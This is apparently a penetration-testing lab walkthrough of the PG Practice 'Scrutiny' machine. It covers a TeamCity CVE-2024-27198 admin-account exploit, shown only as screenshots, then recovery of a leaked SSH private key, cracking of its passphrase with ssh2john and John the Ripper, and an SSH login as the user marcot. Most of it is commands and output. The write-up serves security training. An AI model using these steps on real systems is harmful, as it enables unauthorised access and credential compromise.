Admin Portal
By exploiting CVE-2024-27198, an admin account was created
/Practice/Scrutiny/3-Exploitation/attachments/Pasted-image-20250408000300.png)
/Practice/Scrutiny/3-Exploitation/attachments/{5A8DE05D-7A3C-451B-8F8D-6A6AB07FBFF0}.png)
Logging in to the admin portal using the generated admin credential
TeamCity by JetBrains is widely respected among developers for being a powerful, highly customizable CI/CD tool that’s especially loved in enterprise and complex multi-project environments. It’s known for rock-solid stability, deep integrations (especially with JetBrains IDEs), and smart features like automatic build optimization and parallel testing. But it’s also criticized for being heavier and trickier to set up compared to cloud-native competitors like GitHub Actions or GitLab CI. Among engineering teams that prioritize control, on-prem hosting, and advanced workflows, TeamCity is considered top-tier; however, for fast-moving startups, it sometimes feels “overkill” or “too Java-heavy.” Overall, it has a strong reputation for teams that value flexibility, scalability, and security over out-of-the-box simplicity.
Commit Log
/Practice/Scrutiny/3-Exploitation/attachments/{2D2D1CF6-45A7-4746-919A-970813F63708}.png)
Looking at the Freelancers project, among all those 4 freelancers, Marco Tillman stands out as the user has 1 more build
/Practice/Scrutiny/3-Exploitation/attachments/{F602A3CE-B11C-435C-B4AC-FCDCFF4DDDEF}.png)
Checking the commit log
Oops?
SSH Private Key
/Practice/Scrutiny/3-Exploitation/attachments/{82A5143E-F02B-4639-8C14-B672DDF2EC70}.png)
It an SSH private key
/Practice/Scrutiny/3-Exploitation/attachments/{CE43F73F-E485-4CC3-98CE-425D62119421}.png)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ nano id_rsa.marcot
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ chmod 600 ./id_rsa.marcotSaving the SSH private key
SSH (Fail)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com -i ./id_rsa.marcot
marcot@onlyrands.com's password: Attempting to connect to the target system via SSH with the SSH private key of the marcot user fails
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com -i ./id_rsa.marcot -v
OpenSSH_9.9p2 Debian-1, OpenSSL 3.4.1 11 Feb 2025
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Reading configuration data /etc/ssh/ssh_config.d/20-systemd-ssh-proxy.conf
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to onlyrands.com [192.168.138.91] port 22.
debug1: Connection established.
debug1: identity file ./id_rsa.marcot type 0
debug1: identity file ./id_rsa.marcot-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.9p2 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
debug1: compat_banner: match: OpenSSH_8.2p1 Ubuntu-4ubuntu0.11 pat OpenSSH* compat 0x04000000
debug1: Authenticating to onlyrands.com:22 as 'marcot'
debug1: load_hostkeys: fopen /home/kali/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY
debug1: load_hostkeys: fopen /home/kali/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: Host 'onlyrands.com' is known and matches the ED25519 host key.
debug1: Found key in /home/kali/.ssh/known_hosts:184
debug1: ssh_packet_send2_wrapped: resetting send seqnr 3
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: ssh_packet_read_poll2: resetting read seqnr 3
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,sk-ssh-ed25519@openssh.com,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: get_agent_identities: bound agent to hostkey
debug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities
debug1: Will attempt key: ./id_rsa.marcot RSA SHA256:dsyzOtp/tCH867zyhroVuyBzZGB26KVu06rmiHyrems explicit
debug1: Offering public key: ./id_rsa.marcot RSA SHA256:dsyzOtp/tCH867zyhroVuyBzZGB26KVu06rmiHyrems explicit
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: passwordChecking the verbose log reveals that the failure either comes from that;
- The SSH private key is not valid
- The target SSH server is not configured to handle the key authentication
Inspection
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh-keygen -y -f ./id_rsa.marcot
Enter passphrase for "./id_rsa.marcot": Attempting to inspect the SSH private key with ssh-keygen prompts for passphrase. The SSH private key is password-protected
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh2john ./id_rsa.marcot > id_rsa.marcot.hash
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ john ./id_rsa.marcot.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cheer (./id_rsa.marcot)
1g 0:00:00:10 DONE (2025-04-08 12:11) 0.09478g/s 118.2p/s 118.2c/s 118.2C/s 753951..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Password cracked; cheer
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com
marcot@onlyrands.com password: cheer
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-182-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 08 Apr 2025 10:22:28 AM UTC
System load: 0.0 Processes: 224
Usage of /: 83.5% of 9.75GB Users logged in: 0
Memory usage: 64% IPv4 address for ens160: 192.168.138.91
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have mail.
Last login: Tue Apr 8 10:16:25 2025 from 192.168.45.197
marcot@onlyrands:~$ whoami
marcot
marcot@onlyrands:~$ hostname
onlyrands.com
marcot@onlyrands:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:a4:01 brd ff:ff:ff:ff:ff:ff
inet 192.168.138.91/24 brd 192.168.138.255 scope global ens160
valid_lft forever preferred_lft foreverThe password also works for the marcot user
Initial Foothold established to the target system as the marcot user via SSH
Key Authentication
marcot@onlyrands:~$ ll .ssh/
total 20
drwx------ 2 marcot freelancers 4096 Jun 7 2024 ./
drwxrwx---+ 5 marcot freelancers 4096 Jun 13 2024 ../
-rw------- 1 marcot freelancers 2655 Jun 7 2024 id_rsa
-rw------- 1 marcot freelancers 574 Jun 7 2024 id_rsa.pubThe reason why the key authentication failed earlier is due to the missing authorized_keys file in the SSH directory of the marcot user